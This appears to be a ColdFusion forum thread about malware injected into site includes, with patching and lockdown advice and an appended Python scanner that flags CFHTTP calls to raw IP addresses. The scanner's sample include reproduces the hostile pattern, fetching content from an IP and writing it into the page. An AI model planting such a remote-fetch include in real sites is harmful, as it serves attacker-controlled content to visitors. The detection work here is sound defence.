On two occasions, someone has managed to insert what appears to be malware code into one of my includes. I won't post the actual code, but it consists of a CFHTTP tag that references an IP address, and a CFOUTPUT tag that outputs the value of the CFHTTP. The site is not tied to a database; we only use CFINCLUDEs to simplify global edits (we're relatively new to ColdFusion). The site is hosted by one of Adobe's recommended CF hosting services. Any thoughts on how someone could be adding this code and what we can do to stop them?
Hello Orogeny1,
Please make sure that you have applied the lockdown guide and that the server is fully patched. If there is still a security concern, then please send an email to psirt@adobe.com.
Regards,
Anit Kumar
Thanks, I'm checking with the hosting service now. I'll let you know what they say.
This sounds like you've been the victim of a SQL injection attack, or some other exploit. Make sure that your server is fully patched, that you are running your server in accordance with the Lockdown Guide, and that all of your queries are using queryparams (there is a queryparam scanner on RIAForge.org, I think).
Yeah. Discovered that we hadn't done the lockdown guide and we're in the process of doing that right now. Hopefully this will solve the problem.
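
For checking whether the same kind of code is sitting in other templates, here is an added example (not code from any post in this thread): a Python scan that flags every CFHTTP tag whose `url` attribute points at a raw IPv4 address, the pattern described in the original question. The file extensions, the function names and the sample include are assumptions made for illustration.

```python
import re
import sys
from pathlib import Path

# Matches an opening <cfhttp ...> tag, case-insensitively, across line breaks.
CFHTTP_TAG = re.compile(r"<cfhttp\b[^>]*>", re.IGNORECASE)
# Pulls the url attribute value out of the tag (single or double quoted).
URL_ATTR = re.compile(r"""\burl\s*=\s*(["'])(.*?)\1""", re.IGNORECASE | re.DOTALL)
# A URL whose host is a dotted-quad IPv4 literal rather than a hostname.
IP_HOST = re.compile(r"^(?:https?://)?(\d{1,3}(?:\.\d{1,3}){3})(?=[:/?#]|$)", re.IGNORECASE)
TEMPLATE_SUFFIXES = {".cfm", ".cfml", ".cfc"}  # assumed set of template extensions


def find_ip_cfhttp(source):
    """Return (line_number, url) for each cfhttp tag whose url host is a raw IP."""
    hits = []
    for tag in CFHTTP_TAG.finditer(source):
        attr = URL_ATTR.search(tag.group(0))
        if attr and IP_HOST.match(attr.group(2).strip()):
            line = source.count("\n", 0, tag.start()) + 1
            hits.append((line, attr.group(2).strip()))
    return hits


def scan_tree(root):
    """Scan every ColdFusion template under root; return {path: hits}."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in TEMPLATE_SUFFIXES:
            hits = find_ip_cfhttp(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report


# Constructed sample include; 192.0.2.10 is a documentation-range address.
SAMPLE = """<cfinclude template="header.cfm">
<cfhttp method="get"
        url="http://192.0.2.10/x.txt">
<cfoutput>#cfhttp.fileContent#</cfoutput>
<cfhttp url="https://www.example.com/feed.xml">
"""

if __name__ == "__main__":
    for name, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for line, url in found:
            print(f"{name}:{line}: cfhttp to IP literal {url}")
```

Run it against a copy of the web root and compare any hits with a known-good copy of the site; a hit only means the tag needs a manual look, since a legitimate template may also call an IP address.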